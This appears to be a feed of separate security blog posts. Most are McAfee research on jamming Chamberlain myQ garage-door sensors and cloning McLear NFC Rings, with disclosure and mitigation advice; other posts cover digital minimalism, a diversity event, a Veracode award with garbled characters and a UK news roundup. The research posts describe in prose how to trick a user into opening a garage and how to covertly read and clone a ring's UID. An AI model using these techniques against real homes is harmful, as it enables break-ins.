  • The McLear NFC Ring is now compromised, and the information can be programmed on a standard writable card, which can be used to unlock smart home locks that partner with the product.

How to keep your IoT devices safe from hacking

In the era of IoT devices, the balance between cybersecurity and convenience is an important factor to get right. According to Steve Povolny, head of McAfee Advanced Threat Research, “the numerous benefits technology enhancements bring us are exciting and often highly valuable; but many people are unaware of the lengths hackers will go and the many ways new features can impact the security of a system.” To help safeguard your security while still enjoying the benefits of your connected devices, check out the following tips:

  • Practice proper online security habits. Fortunately, users have many tools at their disposal, even when cybersecurity concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate network, utilize dual-factor authentication when possible, minimize redundant systems, and patch quickly when issues are found.
  • Do your research. Before purchasing a new IoT device, take the time to look into its security features. Users should ensure they are aware of the security risks associated with IoT products available on the market.

Stay up to date

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the Latest IoT Device Flaws appeared first on McAfee Blogs.

We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors

The idea of controlling your garage door remotely and verifying that everything is secure at home, or having packages delivered directly into your garage is enticing for many people. The convenience that many of these IOT devices provide often persuades consumers away from thinking about the possible security concerns.

McAfee Advanced Threat Research recently investigated Chamberlain’s MyQ Hub, a “Universal” garage door automation platform. The way Chamberlain has made this device universal is via a Hub, which acts as a new garage door opener, similar to the one that you would have in your car. This allows the MyQ Hub to retrofit and work with a wide variety of garage doors.

We found that Chamberlain did a fairly good job of securing this device, which is typically uncommon for IOT devices. However, we discovered that there is a flaw in the way the MyQ Hub communicates with the remote sensor over radio frequencies.

From an attack perspective there are three main vectors that we began to look at: local network, remote access (API, or third-party integration), and RF communications between the sensor and the Hub. The first thing we attempted was to gain access to the device via the local network. A quick port scan of the device revealed that it was listening on port 80. When attempting to navigate to the device at port 80 it would redirect to start.html and return a 404 error. No other ports were open on the device.

The inside of the Chamberlain MyQ Hub

Disassembling the Hub revealed a small SOC (system on a chip) module that was handling the Wi-Fi and web communications and a secondary PIC microcontroller which was responsible for controlling the RF side of things for both the garage door and the remote door sensor. The MyQ Hub listed on FCC’s website also included a Bluetooth module that was not present on the two MyQ Hubs that we purchased.

The UART connection was disconnected or not enabled, but the JTAG connection worked to communicate directly with the main Wi-Fi module. With the JTAG connection we were able to dump the entire contents of the flash chip and debug the system unrestricted. The main Wi-Fi module was a Marvell microcontroller that was running a RTOS (Real Time Operating System), which acts much different than a normal Linux system. While it will still run predefined applications, RTOS’ usually don’t have a filesystem like traditional systems do.  We extracted the entire contents of the Marvell microprocessor, and were able to analyze the assembly and determine how the web server behaves.

From looking through the web server code we were able to identify how the device is setup through the local API as well as finding some interesting, albeit not very useful commands that we could send.

Local API commands

There were more URLs that we found to be accessible and some additional API paths, but nothing stood out as a good place to start an attack from. At this point we decided to investigate the other attack vectors.

We didn’t spend too much time looking into the third-party attack vector and remote API since it becomes sort of a gray area for researching. While we were testing with the /sys/mode API call we were able to put the device into a soft factory reset, where we were able to attempt to add the device to a different account. From capturing the SSL traffic on the mobile application, we were able to see that it was failing since the serial number was already registered to another account. We used a technique called SSL unpinning to decrypt traffic from the Android application; we’ll post a future blog explaining this process in greater detail. One thing that we wanted to try was to modify the Android app to send a different serial number. Since we don’t believe that the device ever cleared the original garage door information, we could have potentially opened the device from the new account. However, this is all speculation and was not tested because we didn’t want to access the remote API.

The last vector we looked at was RF. We began trying to break down the frequency modulation between the remote door sensor and the Hub. We originally thought it was some sort of FSK (frequency shift keying) where data is transmitted digitally. If the signal is in one frequency the corresponding bit is 0 and if the signal is shown on another frequency the bit is 1. This idea was thrown out since the MyQ remote sensor was using 3 different frequencies not just two.

Looking at the door sensor’s FCC filing we noticed a particularly helpful revision that they made.

OOK stands for “On OFF Keying” and is another method of encoding digital bits into RF. OOK will either be sending a signal (1) or not sending a signal (0). This means both the transmitter and receiver must be synchronized.

On Off Keying Graphical Representation

Here is the binary representation for the signal captured from the MyQ remote door sensor. This is a tightly zoomed-in window of the entire signal.

One full message captured, each color is a different frequency

aaaaaaaa559999aa59655659a6965aa9a99996aa6aa0aaaaaaaa55a9699a6566696699555a6a5556966555500aaaaaaaa559999aa59655659a6965aa9a99996aa6aa

We can observe the state transmission captured from all three frequencies and converted to hexadecimal. It’s easy to identify data patterns within the transmission, as represented in color above, but we were never able to crack it to arbitrarily transmit false states from our SDR (Software Defined Radio). We also noticed that the RF engineers at Chamberlain had security in mind not only by separating the signal into three separate frequencies, but also by implementing rolling codes. You may be familiar with the rolling code technique from things like your standard garage door opener or your car key fob. Rolling code devices prevent an attacker from directly capturing a signal and replaying it. This is prevented by the signal containing a unique identifier that is noted by the receiver and if the receiver ever sees that signal with the unique ID again it will ignore it.

The way attackers have overcome rolling code devices is by a method called “Roll Jam.” An attacker will jam the rolling code signal from the transmitter, blocking it from ever making it to the receiver, while simultaneously capturing the valid rolling code and storing it. This way the attacker now has an unused and valid rolling code that the receiver has never seen before. The caveat to this method is that normally the victim will notice that either the garage door or car didn’t unlock. A stealthier method to Roll Jam is always capturing the latest code and replaying the latest signal minus 1. This way the car or door will open but the attacker still owns the latest code for their use.

The MyQ also had a rolling code implementation that we were able to develop a variant of this technique against. We took the concept of jamming the original code from the receiver by transmitting a large amount of “noise” directly adjacent to the valid signal frequency. This causes the receiver in the MyQ Hub to overload and not hear the valid signal. However, with the precision of the SDR, we were able to ignore the noise that we are transmitting and store the signal. This was further complicated by the fact that there were three frequencies that we had to simultaneously listen for and jam. If you are interested in this FHSS (Frequency Hopping Spread Spectrum) Roll Jam technique, please read our white paper.

Within the research related to Chamberlain Garage Door Hub described in this blog, the only interference was to unlicensed spectrum radio frequency for the minimum period while the garage door hub was transmitting state signal, and there was no interference with any communications signal licensed or authorized under the Communications Act or FCC rules.

This technique worked, but since the remote sensor and the MyQ Hub always have the advantage in RF landscape, it was unreliable. The jamming aspect of the attack worked nicely; however, since we are outside of the garage and the remote sensor and the Hub are both located within the same garage, it is harder to jam and listen at the same time with the garage door and walls acting as barriers. With higher powered radios, frequency-tuned antennas, and disregard for FCC’s laws, the jamming of the remote sensor could take place at a much further distance than we were able to test in our lab environment.

A waterfall view of the remote sensor signal (red) and jamming (black)

With our jamming working reliably, we confirmed that when a user closes the garage door via the MyQ application, the remote sensor never responds with the closed signal because we are jamming it. The app will alert the user that “Something went wrong. Please try again.” This is where a normal user, if not in direct sight of the garage door, would think that their garage door is indeed open, when in reality it is securely closed. If the user believes the MyQ app then they would do as the application indicates and “try again” – this is where the statelessness of garage doors comes into play. The MyQ Hub will send the open/closed signal to the garage door and it will open, because it is already closed, and it is simply changing state. This allows an attacker direct entry into the garage, and, in many cases, into the home.

Since now the garage door is really open the attacker probably doesn’t want to leave the state as-is, notifying the victim that something went wrong again. Putting the garage door into a closed state and allowing the app to clear the error will put the victim at ease. This could be executed either by a replay from a previously captured closed signal, or, in the most simplistic manner by removing the remote sensor from the Velcro on the garage door and placing it in the vertical position, signaling to the Hub that the door closed successfully.

Attack Reproduction State Flowchart

We also realized that in a real-world scenario, an attacker wouldn’t likely sit outside of a garage all day, so we decided to automate the attack. We used GNU radio to implement a JIT (just in time) method of jamming where the SDR will sit dormant listening on the MyQ’s three separate frequencies. The moment it notices that the remote door sensor is beginning a transmission, it will dynamically enable and start jamming of the signal.

GNU Radio JIT Jamming and State Capture over 3 Simultaneous Frequencies

This expands the use cases of this type of attack by being able to create a small device that could be placed out of sight near the garage door. This technique is also described in more detail in our FHSS white paper. The JIT jamming makes it very difficult to locate the device using RF triangulation and allows it to be better equipped for battery operation.

While this may not be too common for individuals using the MyQ Hub, recall the earlier reference to third-party partnerships with MyQ for garage delivery. Another possible attack would be when a delivery driver uses the application. The primary reason users sign up for this service is the concept of a package delivery to a secure location (garage) even when they are not home. The victim can be absent from the property yet have access via the MyQ app over the internet to open or close the garage door if a delivery driver uses the MyQ hub for an in-garage delivery. A determined hacker could pull this attack off and the victim may have a higher probability of believing that the door may in fact be open. We disclosed our findings in full to Chamberlain on 9/25/2019, including detailed reproduction steps for the jamming attack. We also talked to Chamberlain on this issue with the third-party delivery drivers and how it could fit into this attack model. After extensive testing and validation of the issue, the vendor released an update to the myQ App as of version 4.145.1.36946. This update provides a valuable warning message to users indicating the garage door state may not be accurate, but it does not eliminate the user from remotely controlling the door itself.

The beauty of IOT devices are that they solve problems that we have learned to deal with. After we experience the convenience and the way these devices can automate, secure, or assist in our lives it is hard to see them ever going away. This ease and automation often overshadows the potential security threat that they may pose. Even simple enhancements to manual products over time have this effect; take for example the now-legacy garage door opener in your car. The ability to capture and replay the basic signals transformed the threat from physical to digital space. While the Chamberlain MyQ Hub ultimately produces a generally more secure method of accessing garages than its predecessors, consumers should be aware that any extension of a technology platform, such as using WiFi, a mobile app and FHSS RF transmissions, also extends possible threat vectors.

We would like to finish by commenting that the likelihood of a real-world attack on this target is low, based on the complexity of the attack and installation footprint. We have discussed this with Chamberlain, who has validated the findings and agrees with this assessment. Chamberlain has made clear efforts to build a secure product and appears to have eliminated much of the low-hanging fruit common to IoT devices. This vendor has been a pleasure to work with and clearly prioritizes security as a foresight in the development of its product.

NOTE: Within the research related to Chamberlain Garage Door Hub described in this blog, the only interference was to unlicensed spectrum radio frequency for the minimum period while the garage door hub was transmitting state signal, and there was no interference with any communications signal licensed or authorized under the Communications Act or FCC rules.

 

 

The post We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors appeared first on McAfee Blogs.

The Cloning of The Ring – Who Can Unlock Your Door?

Steve Povolny contributed to this report.

McAfee’s Advanced Threat Research team performs security analysis of products and technologies across nearly every industry vertical. Special interest in the consumer space and Internet of Things (IoT) led to the discovery of an insecure design with the McLear NFC Ring a household access control device. The NFC Ring can be used to interact with NFC-enabled door locks which conform to the ISO/IEC 14443A NFC card type. Once the NFC Ring has been paired with the NFC enabled door lock, the user can access their house by simply placing the NFC Ring within NFC range of the door lock.

McLear originally invented the NFC Ring to replace traditional keys with functional jewelry. The NFC Ring uses near field communication (NFC) for access control, to unlock and control mobile devices, share and transfer information, link people and much more. McLear NFC Ring aims to redefine and modernize access control to bring physical household security through convenience. Their latest ring also supports payment capability with McLear Smart Payment Rings, which were not in scope for this research.

Identity is something which uniquely identifies a person or object; an NFC tag is a perfect example of this. Authentication can be generally classified into three types; something you know, something you have and something you are. A NFC Ring is different from the general NFC access tag devices (something you have) as the Ring sits on your finger, so it is a hybrid authentication type of something you have and something you are. This unique combination, as well as the accessibility of a wearable Ring with NFC capabilities sparked our interest in researching this product as an NFC-enabled access control device. Therefore, the focus of our research was on NFC Ring protection against cloning as opposed to the door lock, since NFC access control tags and door locks have been well-researched.

The research and findings for this flaw were reported to McLear on September 25, 2019. To date, McAfee Advanced Threat Research has not received a response from the vendor.

Duplicating Keys Beyond the Hardware Store

In the era of Internet of Things (IoT), the balance between security and convenience is an important factor to get right during the concept phase of a new product and the bill of materials (BOM) selection. The hardware selection is critical as it often determines the security objectives and requirements that can be fulfilled during design and implementation of the product lifecycle. The NFC Ring uses an NFC capable Integrate Circuit (IC) which can be easily cloned and provides no security other than NFC proximity. The NFC protocol does not provide authentication and relies on its operational proximity as a form of protection. The problem with NFC Tags is that they automatically transmit their UID when in range of NFC device reader without any authentication.

Most consumers today use physical keys to secure access to their household door. The physical key security model requires an attacker to get physical access to the key or break the door or door lock. The NFC Ring, if designed securely, would provide equal or greater security than the physical key security model. However, since the NFC Ring can be easily cloned without having to attain physical access to the Ring, it makes the product’s security model less secure than a consumer having a physical key.

In this blog we discuss cloning of the NFC Ring and secure design recommendations to improve its security to a level equal to or greater than existing physical keys.

NFC Ring Security Model and Identity Theft

All McLear non-payment NFC Rings using NTAG216 ICs are impacted by this design flaw. Testing was performed specifically on the OPN which has an NTAG216 IC. The NFC Ring uses the NTAG 216 NFC enabled Integrated Circuit (IC) to provide secure access control by means of NFC communication.

The NFC protocol provides no security as it’s just a transmission mechanism.  The onus is on product owners to responsibly design and implement a security layer to meet the security objectives, capable of thwarting threats identified during the threat modeling phase at concept commit.

The main threats against an NFC access control tag are physical theft and tag cloning by NFC. At a minimum, a tag should be protected against cloning by NFC; with this research, it would ensure the NFC Ring provides the same level of security as a physical key. Ideal security would also protect against cloning even when the NFC Ring has been physically stolen which would provide greater security than that of a physical key.

The NTAG216 IC provide the following security per the NFC Ring spec:

  1. Manufacturer programmed 7-byte UID for each device
  2. Pre-programmed capability container with one-time programmable bits
  3. Field programmable read-only locking function
  4. ECC based originality signature
  5. 32-bit password protection to prevent unauthorized memory operations

The NFC Ring security model is built on the “Manufacturer programmed 7-byte UID for each device” as the Identity and Authentication with the access control principle or door lock. This 7-byte UID (unique identifier) can be read by any NFC enabled device reader such as a proxmark3 or mobile phone when within NFC communication range.

The NFC Ring security model can be broken by any NFC device reader when they come within NFC communication range since the static 7-byte UID is automatically transmitted without any authentication. Once the 7-byte UID has been successfully read, a magic NTAG card can be programmed with the UID, which forms a clone of the NFC Ring and allows an attacker to bypass the secure access control without attaining physical access to the NFC Ring.

The NFC Ring is insecure by design as it relies on the static 7-byte UID programmed at manufacture within the NTAG216 for device identity and authentication purposes. The NFC Ring security model relies on NFC proximity and a static identifier which can be cloned.

In addition, we discovered that the UIDs across NFC Rings maybe predictable (this was a very small sample size of three NFC Rings):

  • NFC Ring#1 UID 04d0e722993c80
  • NFC Ring#2 UID 04d24722993c80
  • NFC Ring#3 UID 04991c4a113c80

There is only a 22-byte difference between the UID of NFC Ring#1 and NFC Ring#2 (0x24-0x0e). By social engineering when a victim purchased their NFC Ring, an attacker could purchase a significant sample size of NFC Rings around the same time and possibly brute force their NFC Ring UID.

Social Engineering

Social Engineering consists of a range of techniques which can be used through human interaction for many malicious purposes such as identity theft. In the case of the NFC Ring the goal is to steal the user’s identity and gain access to their home. Reconnaissance can be performed online to gain background information such as what type of technology is being used by the victim for their home access.

One of the most common exchanges of technology today has become the passing of a phone between two untrusted parties to take a picture. The NFC Ring social engineering attack could be as simple as requesting the victim to take a picture with the attacker-supplied phone. The victim-as-helpful-photographer holds the attacker’s phone, which can read NFC tags and could be equipped with a custom Android app to read the NFC Ring UID, all transparent to the victim while they are snapping away. There is no sign to the victim that their NFC Ring is being read by the phone. It is recorded in the system log and cannot be viewed until a USB cable is attached with required software. Once the Ring is compromised, it can be reprogrammed on a standard writable card, which can be used to unlock smart home locks that partner with this product. The victim’s home is breached.

How It’s Done: NFC Ring Cloning

To successfully clone an NFC Tag, one must first identify the Tag type. This can be done by looking up the product specifications in some cases, or verifying by means of an NFC device reader such as a proxmark3.

From the NFC Ring specs we can determine most of the required tag characteristics:

  1. IC Model: NTAG216
  2. Operating Frequency: 13.56Mhz
  3. ISO/IEC: 14443A
  4. User writable space: 888 bytes
  5. Full specifications

In addition, by communicating with a proxmark3 attackers can physically verify the NFC Tag characteristics and obtain the UID which is required for cloning.

The most straightforward method to stealing the unique identifier of the Ring would be through a mobile phone. The following steps were taken in the below demo:

  1. Reading of NFC Ring with proxmark3 and cloning NTAG21x emulator card
  2. Setting attacker’s phone to silent to prevent NFC Tag detection sound
  3. Running our customized Android app to prevent Android activity popup when NFC Tag detected and read.

Mitigation Secure Design Recommendations

Lock the door. The existing insecure design can be mitigated by using NFC Doorlock password protection in combination with the NFC Ring for two factor authentication.

Authenticate. NFC Ring designers must mandate a secure PKI design with an NFC Tag which contains a crypto module that provides TAG authentication. The NFC Ring secure design must mandate a security layer on top of NFC to access control device manufacturers to ensure secure and trustworthy operation.

Randomize UIDs. In addition, the NFC designers must ensure they are not manufacturing NFC Rings with sequential UIDs which may be predictable with purchase date.

Consumer Awareness

To make customers aware of the security risks associated with products available on the market, product manufacturers should clearly state the level of security which their product provides in comparison with the technology or component they claim to be advancing. Are customers holding the master key to unlock their door, and are there duplicates?

In the case of the NFC Ring, while convenient, it clearly does not provide the same level of security to consumers as a physical key. This decrease in security model from a physical key to a NFC Ring is not due to technology limitations but due to an insecure design.

 

The post The Cloning of The Ring – Who Can Unlock Your Door? appeared first on McAfee Blogs.

The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers

This week McAfee Advanced Threat Research (ATR) published new findings, uncovering security flaws in two popular IoT devices: a connected garage door opener and a “smart” ring, which, amongst many uses, utilizes near field communication (NFC) to open door locks.

I’d like to use these cases as examples of a growing concern in the area of product security. The industry of consumer devices has seen some positive momentum for security in recent years. For example, just a few years back, nearly every consumer-grade router shipped with a default username and password, which, if left unchanged, represented a serious security concern for home networks. At a minimum, most routers at least now ship with a unique password printed on the physical device itself, dramatically increasing the overall network security. Despite positive changes such as this, there is a long way to go.

If we think about the history of garage doors, they began as a completely manual object, requiring the owner to lift or operate it physically. The first overhead garage door was invented in the early 1920s, and an electric version came to market just a few years later. While this improved the functionality of the device and allowed for “remote” entry, it wasn’t until many years later that an actual wireless remote was added, giving consumers the ability to allow wireless access into their home. This was the beginning of an interesting tradeoff for consumers – an obvious increase in convenience which introduced a potential new security concern.

The same concept applies to the front door. Most consumers still utilize physical keys to secure the front door to their homes. However, the introduction of NFC enabled home door locks, which can be opened using compatible smart rings, adds both convenience and potentially compromised security.

For example, upon investigating the McLear NFC Ring, McAfee ATR uncovered a design insecurity, which could allow an attacker to easily clone the NFC Ring and gain entry to a home utilizing an NFC enabled smart lock.

While the NFC Ring modernizes physical household security, the convenience that comes with technology implementation also introduces a security issue.

The issue here is at a higher level; where and when do we draw the line for convenience versus security? The numerous benefits technology enhancements bring are exciting and often highly valuable; but many are unaware of the lengths cyber criminals will go to (for example, we once uncovered a vulnerability in a coffee pot which we were able to leverage to gain access to a home Wi-Fi network) and the many ways new features can reduce the security of a system.

As we move towards automation and remote access to nearly every computerized system on the planet, it’s our shared responsibility to maintain awareness of this fact and demand a higher bar for the products that we buy.

So what can be done? The responsibility is shared between consumers and manufacturers, and there are a few options:

For consumers:

  • Practice proper cyber hygiene. From a technical perspective, consumers have many tools at their disposal, even when security concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate, network, utilize dual-factor authentication when possible, minimize redundant systems and patch quickly when issues are found.
  • Do your research. Consumers should ensure they are aware of the security risks associated with products available on the market.

For product manufacturers:

  • Manufacturer supported awareness. Product manufacturers can help by clearly stating the level of security their product provides in comparison with the technology or component they seek to advance.

Embrace vulnerability disclosure. Threat actors are constantly tracking flaws which they can weaponize; conversely, threat researchers are constantly working to uncover and secure product vulnerabilities. By partnering with researchers and responding quickly, vendors have a unique opportunity

The post The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers appeared first on McAfee Blogs.

Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour

A bus, virtual reality, and conversations around inclusion.

How do all these fit together? The answer: CEO Action’s Check Your Blind Spots Bus Tour.

Working at McAfee means innovating in everything we do – it’s imperative for us to stay a step ahead of cyberattacks. This includes new approaches to challenge thinking about diversity. That’s where CEO Action and Check Your Blind Spots Bus Tour comes in.

In December, McAfee was honored to be among the one hundred stops around the country of an interactive, eye-opening mobile tour that used virtual reality and gaming technology to help us recognize unconscious biases or blind spots.

Inside the Tour Bus

When the tour bus rolled up, McAfee team members lined up to uncover unconscious bias in a new way with immersive gaming technology. Some of the interactive elements included:

  • Wake Up Call: A 100% audio experience, through a wall of ringing phones, McAfee team members picked up a receiver to overhear conversations between landlords, tenants, and potential renters that reveal unintended bias.
  • Look Through a Different Lens: Via gamification and digital viewfinder, McAfee team members watched an interaction between co-workers setting up a work-related event and then, identified moments when unconscious biases are demonstrated.
  • Face Yourself, Face Reality: In front of a mirror, McAfee team members watched as their reflection fades away to reveal a different person staring back at them. Through this touchscreen experience, each new reflection shares a series of biases they’ve experienced.

McAfee team members share their experience:

Sign the I Act On Pledge

Ready to take action and drive inclusive behaviors in your day-to-day life? Join the hundreds of McAfee employees who signed the I Act On Pledge to do just that.

I pledge to check my bias, speak up for others and show up for all.

Take the pledge.

 

It’s a new year! Start off strong with a company that’s invested in building an inclusive workplace. Search our openings.

The post Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour appeared first on McAfee Blogs.

Is It Time to Overhaul Your Relationship with Technology?

digital minimalism

Editor’s Note: This is part I of a series on Digital Minimalism in 2020.

When Steve Jobs introduced the iPhone in 2007, he called it the “best iPod ever,” and said it would be a “very cool way” to make calls and listen to music. Little did he know that it would be the catalyst to a future technology tsunami of social networks, apps, and gaming platforms that would come to own our collective attention span.

But here we are. We daily enter an algorithm ecosystem that has little to do with our initial desire to connect with friends and have a little fun. We’ve gone from fumbling to find our flip phones to checking our phones 96 times a day —that’s once every 10 minutes, according to recent research

We’re getting it

However, with more time and knowledge behind us, parents and consumers are starting to get it.

We now know that companies deliberately engineer our favorite digital destinations to get us hooked. With every “like,” emoji, comment, and share, companies have figured out how to tap into our core human motivators of sensation, anticipation, which keeps our dopamine levels amped the same way tobacco, gambling, or overeating might do. 

This evolution of marketing and economics has hit us all hard and fast. But as Maya Angelou famously said, when we know better, we can do better. Stepping into 2020 may be the best time to rethink — and totally reconstruct — our relationship with technology.

digital minimalism

Digital Detox vs. Digital Minimalism

We’ve talked a lot about digital detox strategies, which, no doubt, have helped us reduce screen time and unplug more. However, there’s a new approach called digital minimalism that may offer a more long-term, sustainable solution to our tech-life balance.

The difference in approaches is this: A detox implies you will stop for a brief period and then resume activities. Digital minimalism is stopping old habits permanently and reconstructing a new way forward.

Digital minimalism encourages us to take a long, hard, honest look at our relationship with technology, be open to overhauling our ideology, and adopt a “less is more” approach.

Author Cal Newport examines the concept in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World and is based on three principles: a) clutter is costly b) optimization is important c) intentionality is satisfying. 

According to Newport, digital minimalism allows us to rebuild our relationship with technology so that it serves us — not the other way around. Here’s the nugget: When you can clearly define and understand your values, you can make better, more confident decisions about what technology you use and when.

Three core principles

• Scrutinize value. Digital clutter is costly. Therefore, it’s critical to examine every piece of technology you allow into your life and weigh it against what it costs you in time, stress, and energy.

Ask yourself: 

What am I genuinely gaining from the time I am spending on this site?
What is being here costing me in terms of money and attention?
What emotions rise (positive, negative) when I’m using this app/site?
Can I perform the same task differently?

• Optimize resources. You don’t have to throw out all your technology to be a digital minimalist. Instead, optimization is determining what digital sources bring you the most value. For example, you may habitually scroll six news sources each day when you only gain value from two. You may have six active social networks you frequent out of obligation or habit when only one actually offers you value and genuine connection.

Ask yourself:

What app/site is the most accurate and valuable to me?
What app/site feed my emotions, goals, and relationships in a positive, healthy way?
What app/site helps me personally to work more efficiently?

• Align tech with values. The third principle of intentionality is inspired by the Amish way of life and encourages holding every technology decision up against your fundamental values. For instance, if spending time on a specific app doesn’t support your priorities of family and personal health, then that fun, albeit misaligned app does not make the cut. 

Ask yourself:

Does this activity benefit and support my values and what I’m trying to do in my life?
Am I better off without this online activity?

Getting started

  • 30-days of less. For 30 days, cut out all non-essential technology from your life. Use only what is essential to your income and health. 
  • Reflect on values. Reflect on the things that are truly important to you and your family. Think about what activities bring you joy and which specific people interest you. If you decide that creating art or volunteering are your central values, ask yourself, “Does this technology support my value of creating art and volunteering?”
  • Increase solitude. Researchers have found a connection between lack of solitude and the increase in depression and anxiety among digital natives (iGen) they call isolation depravation. Solitude allows us to process, reflect, and problem solve. Little by little, begin to increase your time for personal reflection. 

While it’s easy to demonize the growing presence and power of technology (smartphones and social media specifically) in family life, it’s also added amazing value and isn’t going anywhere soon. So we do what we can do, which is to stop and examine the way we use technology daily and the amount of control we give it over our time, hearts, and minds. 

The post Is It Time to Overhaul Your Relationship with Technology? appeared first on McAfee Blogs.

SC Media Inducts Veracode into its 2019 Innovator Hall of Fame

SC Media???s

We are excited to announce that Veracode has been inducted into SC Media???s 2019 Innovator Hall of Fame. To select the honorees, the SC Media team leverages data from SC Labs testing groups, conferences, research, and referrals. The team then evaluates the nominees against strict criteria to ensure that the final selection is comprised of vendors with the most promising products and capabilities.

We???re honored to be one of only five new Hall of Fame inductees!

To announce its innovators, SC Media publishes an annual eBook highlighting the selected vendors??? greatest strengths.

???We interviewed each vendor to understand the security problems they identified and mitigated with their latest innovations,??? the SC Media editors wrote. ???Almost every organization pointed to two interrelated struggles: exhausting technological ???noise??? and personnel fatigue.??? This leaves security operations centers understaffed, overwhelmed, and frustrated, they continued.

???The vendors on this list understand these problems and recognize how such issues inhibit business operations and user experiences. They have responded with two helpful solutions: advanced automation and threat prioritization. Many platforms include artificial intelligence and machine learning that recognize patterns and can replicate remediation processes in the future to remove the manual burden from SOCs. Many new solutions also can determine whether a noted threat poses significant or minimal risk and adjust alert policies accordingly. In nearly every case, both automation and threat prioritization are integrated into a platform that can then easily integrate with existing infrastructures, making the transition to these nextgen solutions quick and easy,??? the editors said.

Veracode was selected as an honoree in the Virtualization and cloud-based security category. The description said, in part:

The Veracode Platform provides an entire system of testing, scans and analysis that minimizes the presence of vulnerabilities and produces more secure software as a result. Veracode knows that vendors want to develop, use and sell software with confidence. By integrating into the development process multiple testing techniques ??? including static, dynamic and software composition analysis ??? the Veracode Platform can anticipate many potential vulnerabilities and resolve them before they ever materialize in a software???s final form.

Veracode also differentiates itself as a SaaS provider, according to SC Media, saying the model ???makes Veracode versatile enough for local and global use, even by organizations with highly distributed personnel or partners.???

The recognition went on to say:

Veracode hopes to influence the cybersecurity ecosystem as well as the organizations they serve, so that vulnerability prevention becomes not just one possible solution amidst a series of alternatives but a standard step in software development procedures. All enterprises developing their own applications will likely benefit from the security measures integrated into the Veracode platform.

Veracode is also recognized for its ability to ease the workload of security and development teams by integrating multiple testing techniques into the development process. This strength is making a positive cultural impact on the perception of cybersecurity measures.

To learn more about our induction into the Innovator Hall of Fame, check out SC Media???s eBook, Innovators. For additional information on our comprehensive suite of products and services, visit the Veracode homepage.ツ?

Cyber Security Roundup for January 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, December 2019.

Happy New Year!  The final month of the decade was a pretty quiet one as major security news and data breaches go, given cybers attack have become the norm in the past decade. The biggest UK media security story was saved for the very end of 2019, with the freshly elected UK government apologising after it had accidentally published online the addresses of the 1,097 New Year Honour recipients.  Among the addresses posted were those of Sir Elton John, cricketer and BBC 'Sports Personality of the Year' Ben Stokes, former Conservative Party leader Iain Duncan Smith, 'Great British Bakeoff Winner' Nadiya Hussain, and former Ofcom boss Sharon White. The Cabinet Office said it was "looking into how this happened", probably come down to a 'user error' in my view.

An investigation by The Times found Hedge funds had been eavesdropping on the Bank of England’s press conferences before their official broadcast after its internal systems were compromised. Hedge funds were said to have gained a significant advantage over rivals by purchasing access to an audio feed of Bank of England news conferences. The Bank said it was "wholly unacceptable" and it was investigating further. The Times claimed those paying for the audio feed, via the third party, would receive details of the Bank's news conferences up to eight seconds before those using the television feed - potentially making them money. It is alleged the supplier charged each client a subscription fee and up to £5,000 per use. The system, which had been misused by the supplier since earlier this year, was installed in case the Bloomberg-managed television feed failed.

A video showing a hacker talking to a young girl in her bedroom via her family's Ring camera was shared on social media. The hacker tells the young girl: "It's Santa. It's your best friend." The Motherboard website reported hackers were offering software making it easier to break into such devices. Ring owner Amazon said the incident was not related to a security breach, but compromised was due to password stuffing, stating "Due to the fact that customers often use the same username and password for their various accounts and subscriptions, bad actors often re-use credentials stolen or leaked from one service on other services."


Ransomware continues to plague multiple industries and it has throughout 2019, even security companies aren't immune, with Spanish security company Prosegur reported to have been taken down by the Ryuk ransomware.

Finally, a Microsoft Security Intelligence Report concluded what all security professionals know well, is that implementing Multi-Factor Authenication (MFA) would have thwarted the vast majority of identity attacks. The Microsoft study found reusing passwords across multiple account-based services is still common, of nearly 30 million users and their passwords, password reuse and modifications were common for 52% of users. The same study also found that 30% of the modified passwords and all the reused passwords can be cracked within just 10 guesses. This behaviour puts users at risk of being victims of a breach replay attack. Once a threat actor gets hold of spilled credentials or credentials in the wild, they can try to execute a breach replay attack. In this attack, the actor tries out the same credentials on different service accounts to see if there is a match.

BLOG
NEWS 
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE